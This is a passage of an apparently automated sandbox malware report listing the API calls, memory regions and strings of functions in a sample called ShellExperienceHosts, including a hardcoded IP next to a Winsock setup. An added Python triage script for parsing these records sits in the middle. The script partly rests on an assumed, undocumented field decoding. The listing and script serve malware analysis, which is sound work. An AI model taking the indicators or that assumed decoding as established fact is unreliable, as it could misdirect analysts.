                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000016), ref: 6C7413A5
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000F), ref: 6C7413B8
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000015), ref: 6C7413CF
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000F), ref: 6C7413DB
                                                                              • Part of subcall function 6C741395: GetDeviceCaps.GDI32(?,0000000C), ref: 6C741403
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000F), ref: 6C741411
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000010), ref: 6C74141F
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000015), ref: 6C74142D
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000016), ref: 6C74143B
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000014), ref: 6C741449
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000012), ref: 6C741457
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000011), ref: 6C741465
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000006), ref: 6C741470
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000D), ref: 6C74147B
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000E), ref: 6C741486
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000005), ref: 6C741491
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000008), ref: 6C74149F
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000009), ref: 6C7414AA
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000007), ref: 6C7414B5
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000002), ref: 6C7414C0
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(00000003), ref: 6C7414CB
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000001B), ref: 6C7414D9
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000001C), ref: 6C7414E7
                                                                              • Part of subcall function 6C741395: GetSysColor.USER32(0000000A), ref: 6C7414F5
                                                                              • Part of subcall function 6C7417B3: __EH_prolog3_GS.LIBCMT ref: 6C7417BD
                                                                              • Part of subcall function 6C7417B3: GetDeviceCaps.GDI32(?,00000058), ref: 6C7417DD
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741839
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741857
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741875
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C741893
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C7418B1
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C7418CF
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C7418ED
                                                                              • Part of subcall function 6C7417B3: DeleteObject.GDI32(00000000), ref: 6C74190B
                                                                              • Part of subcall function 6C741CD2: GetSystemMetrics.USER32(00000031), ref: 6C741CE0
                                                                              • Part of subcall function 6C741CD2: GetSystemMetrics.USER32(00000032), ref: 6C741CEE
                                                                              • Part of subcall function 6C741CD2: SetRectEmpty.USER32(?), ref: 6C741D01
                                                                              • Part of subcall function 6C741CD2: EnumDisplayMonitors.USER32(00000000,00000000,6C7424AA,?,?,?), ref: 6C741D11
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C741D20
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C741D4D
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C741D61
                                                                              • Part of subcall function 6C741CD2: SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C741D87
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Color$DeleteObject$System$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 2442922003-0
                                                                            • Opcode ID: 8fa58d2472f771d3c4ece49c083de971bc97aa0da113882dac5b48d2567173fd
                                                                            • Instruction ID: ab27736b355db7e6a912308db74458c68776df81c43321b7579f5786ce590e04
                                                                            • Opcode Fuzzy Hash: 8fa58d2472f771d3c4ece49c083de971bc97aa0da113882dac5b48d2567173fd
                                                                            • Instruction Fuzzy Hash: 1B11A7B0A00318ABDB21AF718D4DFEE77BDEB89708F00456DA14596281CBB45E44CFE0
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 10006F31
                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                            • std::exception::exception.LIBCMT ref: 10006F66
                                                                            • std::exception::exception.LIBCMT ref: 10006F80
                                                                            • __CxxThrowException@8.LIBCMT ref: 10006F91
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID:
                                                                            • API String ID: 615853336-0
                                                                            • Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                            • Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
                                                                            • Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
                                                                            • Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740
                                                                            APIs
                                                                            • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6C6CDAAD
                                                                            • _strlen.LIBCMT ref: 6C6CDAF8
                                                                              • Part of subcall function 6C6BC08C: _strlen.LIBCMT ref: 6C6BC11C
                                                                            Strings
                                                                            • Error retrieving folder path, xrefs: 6C6CDAB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$FolderPath
                                                                            • String ID: Error retrieving folder path
                                                                            • API String ID: 1827750136-3197305068
                                                                            • Opcode ID: 2a06bea3fe94524109c7e21964b7819641e99e4243e2f1f370117d2c9a8bc877
                                                                            • Instruction ID: 6ab1fd9807019f3ef5bc697d91e0f57f2fc31230072c067036b02748c2983b0b
                                                                            • Opcode Fuzzy Hash: 2a06bea3fe94524109c7e21964b7819641e99e4243e2f1f370117d2c9a8bc877
                                                                            • Instruction Fuzzy Hash: 2021C4F2A403446BD3309F25AC44AABB6FCDFA2708F100E29E48583B01E771955887A6
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000202,?), ref: 6C6D86E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Startup
                                                                            • String ID: $118.107.44.112
                                                                            • API String ID: 724789610-245858108
                                                                            • Opcode ID: 2079653e0b7db0de2f38d1db8d31f422b1f61d99debe4a336518e5e52208b68c
                                                                            • Instruction ID: f375abfda3ff14123f20ab1d6f9f66a0bc58dba237184d48e095c34f27e91feb
                                                                            • Opcode Fuzzy Hash: 2079653e0b7db0de2f38d1db8d31f422b1f61d99debe4a336518e5e52208b68c
                                                                            • Instruction Fuzzy Hash: DEE030704183419AE2009F11C908BABB6E8AFDA30CF015B0DB4D455151D3B4A6888B96
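The records above are the sandbox's raw per-function output: each API call with its arguments and return address, the memory-dump region the function was recovered from, and the strings the function references. Three things in them deserve a second look: the WSAStartup function carries the literal 118.107.44.112 in its String ID; the VirtualAlloc/VirtualFree pairs commit memory with MEM_COMMIT (00001000) and PAGE_READWRITE (00000004), i.e. not executable at allocation time; and several functions were recovered from dumps marked "based on PE: true" at 10000000 and 03320000, away from the 6C6B0000 module image. The Python below is an added triage example, not code from this Joe Sandbox report or from Joe Security; it parses entries in this layout and applies those three checks. The sample input is constructed from entries shown on this page. The decoding of the dotted .sdmp file-name fields into base address, page protection and region type is an assumption (inferred from those values lining up with normal PE section protections) and is not documented on this page.

```python
# Added triage helper (not part of the Joe Sandbox report): parses the per-function
# records above ("APIs" / "Source File" / "String ID" lines) and flags what matters.
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample: three entries copied from the listings above, trimmed to
# the lines the parser reads (headings such as "Similarity" are ignored anyway).
SAMPLE = """\
APIs
• WSAStartup.WS2_32(00000202,?), ref: 6C6D86E1
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• String ID: $118.107.44.112
APIs
• __floor_pentium4.LIBCMT ref: 033211E9
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03321226
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03321255
• Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
• String ID:
APIs
• SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6C6CDAAD
• _strlen.LIBCMT ref: 6C6CDAF8
  • Part of subcall function 6C6BC08C: _strlen.LIBCMT ref: 6C6BC11C
• Error retrieving folder path, xrefs: 6C6CDAB7
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• String ID: Error retrieving folder path
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SRC_RE = re.compile(
    r"^\s*•\s*Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PAGE_EXECUTE_READWRITE = 0x40   # winnt.h
MEM_PRIVATE = 0x20000           # winnt.h

Call = namedtuple("Call", "api module args ref subcall")

@dataclass
class Entry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    dump_name: str = ""
    offset: int = 0
    based_on_pe: bool = False

def parse_entries(text):
    """Split the listing into Entry objects; a bare "APIs" line starts a new one."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                                  "Part of subcall" in s))
        elif m := SRC_RE.match(line):
            cur.dump_name, cur.offset = m["name"], int(m["off"], 16)
            cur.based_on_pe = m["pe"] == "true"
        elif s.startswith("• String ID:"):
            # Joe Sandbox joins several strings with '$'; drop empty pieces.
            cur.strings = [p for p in s[len("• String ID:"):].strip().split("$") if p]
    return entries

def decode_dump_name(name):
    """ASSUMED .sdmp layout pid.seq.time.base.protect.?.type.idx (inferred, not documented)."""
    f = name[: -len(".sdmp")].split(".")
    return {"base": int(f[3], 16), "protect": int(f[4], 16), "type": int(f[6], 16)}

def triage(entry):
    """Return findings for one entry; an empty list means nothing stood out."""
    out = []
    apis = {c.api for c in entry.calls}
    ips = [ip for s in entry.strings for ip in IPV4_RE.findall(s)]
    if ips:
        out.append(f"hardcoded IPv4 literal(s) {ips}")
        if apis & {"WSAStartup", "connect", "WSAConnect"}:
            out.append("Winsock set up in the same function: probable C2 endpoint")
    for c in entry.calls:
        if c.api == "VirtualAlloc" and len(c.args) == 4 and c.args[3] != "?":
            prot = int(c.args[3], 16)   # flProtect argument
            tag = "RWX" if prot == PAGE_EXECUTE_READWRITE else f"protect 0x{prot:02X}, not executable"
            out.append(f"VirtualAlloc at {c.ref:08X}: {tag}")
    if entry.dump_name:
        d = decode_dump_name(entry.dump_name)
        if d["protect"] == PAGE_EXECUTE_READWRITE:
            out.append(f"dump region {d['base']:08X} is RWX")
        if entry.based_on_pe and d["type"] == MEM_PRIVATE:
            out.append(f"PE rebuilt from private (non-image) memory at {entry.offset:08X}: unpacked or injected code")
    return out
```

Call parse_entries(SAMPLE) and run triage() over each entry: the WSAStartup entry yields the hardcoded-IP and C2 findings, the 03320000 entry yields the read-write commit, the RWX dump region and the PE-in-private-memory findings, and the SHGetFolderPathA entry (a normal image-backed function with a benign error string) yields nothing, which is the expected negative control. Feeding the tool the report's full listing needs no change beyond reading the file, since headings and "Associated:" lines are ignored.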
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332316B
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 03323183
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332322F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 4033114805-0
                                                                            • Opcode ID: 1dadcbc643ca78f458980a523463b33f5a08dd1565989f942dbe84ce5a8edcc6
                                                                            • Instruction ID: 91eb7a04fbc9ae28aead419ef79ce67375ac420469e38bd49d8a53261ea12484
                                                                            • Opcode Fuzzy Hash: 1dadcbc643ca78f458980a523463b33f5a08dd1565989f942dbe84ce5a8edcc6
                                                                            • Instruction Fuzzy Hash: A431AB782007129FC718EF29C9C0A66BBE8FF44724B10C52CE85ACB615D735F842CB80
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 100011E9
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                            • Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
                                                                            • Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
                                                                            • Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 033211E9
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03321226
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03321255
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 954ceaf07e5cf2d3dc7274f9e06e57d44902ca391897fad33a78dea16d7792fb
                                                                            • Instruction ID: c7385750f3169bd40e060242d8e7079be90c2c31b9d26d6d44e2b4771d430827
                                                                            • Opcode Fuzzy Hash: 954ceaf07e5cf2d3dc7274f9e06e57d44902ca391897fad33a78dea16d7792fb
                                                                            • Instruction Fuzzy Hash: 53219F75E00709AFDB10DFADD985B6EFBF8EF40B05F0085A9E949E2640EB30B8108750
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 1000112F
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                            • Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
                                                                            • Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
                                                                            • Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750
                                                                            APIs
                                                                            • __floor_pentium4.LIBCMT ref: 0332112F
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0332115F
                                                                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03321192
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree__floor_pentium4
                                                                            • String ID:
                                                                            • API String ID: 2605973128-0
                                                                            • Opcode ID: 6cab5527f08b8b816b9d337634c81c830dfba5faf25ee0fd318f3e328052ca35
                                                                            • Instruction ID: 4456e845e9d17353c12ce91a273bb604f6121080ae1433d109017182da238f14
                                                                            • Opcode Fuzzy Hash: 6cab5527f08b8b816b9d337634c81c830dfba5faf25ee0fd318f3e328052ca35
                                                                            • Instruction Fuzzy Hash: D4118175E00708ABDB109FA9DDC5B6EFBB8EF04705F0085A9E959E2240E770A9108750
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,00000000,CF830579,?,6C86BC6E,00000000,CF830579,6C8E96D0,0000000C,6C86BBF6,6C85EE16,?), ref: 6C86BB36
                                                                            • GetLastError.KERNEL32 ref: 6C86BB40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID: "q
                                                                            • API String ID: 918212764-1686213398
                                                                            • Opcode ID: ea16db28809552091ea7e35b30adbc8eba0e9fbfe1518d2deba962e240cdf00a
                                                                            • Instruction ID: 955e3fa7e519ce6b2438cf071d00ab3cba6b511c7881147904a80137427a6ec8
                                                                            • Opcode Fuzzy Hash: ea16db28809552091ea7e35b30adbc8eba0e9fbfe1518d2deba962e240cdf00a
                                                                            • Instruction Fuzzy Hash: 121159326052182ACA34463FAA05FBD37A98F4373DF250A39F92986EC4DBB088409290
                                                                            APIs
                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03329E04
                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03329E18
                                                                            • GdipDisposeImage.GDIPLUS(?), ref: 03329E3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                            • String ID:
                                                                            • API String ID: 800915452-0
                                                                            • Opcode ID: a2e6311966bda3e504e44860452d67a1df57c8c0e52ea1552ded3813bb104f78
                                                                            • Instruction ID: b8a168402d1b5ab72b216615f1542b20a6a430eeba51242fd71aa1d7346aa85a
                                                                            • Opcode Fuzzy Hash: a2e6311966bda3e504e44860452d67a1df57c8c0e52ea1552ded3813bb104f78
                                                                            • Instruction Fuzzy Hash: 5DF03176D00229978B10EF94D8848AFFBB9AB45711F05455AF805BB354DB309A15CBD1
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(0334FB64), ref: 03329ADC
                                                                            • GdiplusStartup.GDIPLUS(0334FB60,?,?), ref: 03329B15
                                                                            • LeaveCriticalSection.KERNEL32(0334FB64), ref: 03329B26
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                            • String ID:
                                                                            • API String ID: 389129658-0
                                                                            • Opcode ID: ff0105f8721bf93a29825930cce5d7130d7ddd48f3afa7ad6d4de1ac43a03aff
                                                                            • Instruction ID: b37204f209eb5252582e34732d14c4c2dd416e511f7e3aba0333b1974486d2ef
                                                                            • Opcode Fuzzy Hash: ff0105f8721bf93a29825930cce5d7130d7ddd48f3afa7ad6d4de1ac43a03aff
                                                                            • Instruction Fuzzy Hash: 0BF062759412099FDF00EFD1E8EA7ABBBBCF705305F440199E50492141DB722154CBE2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
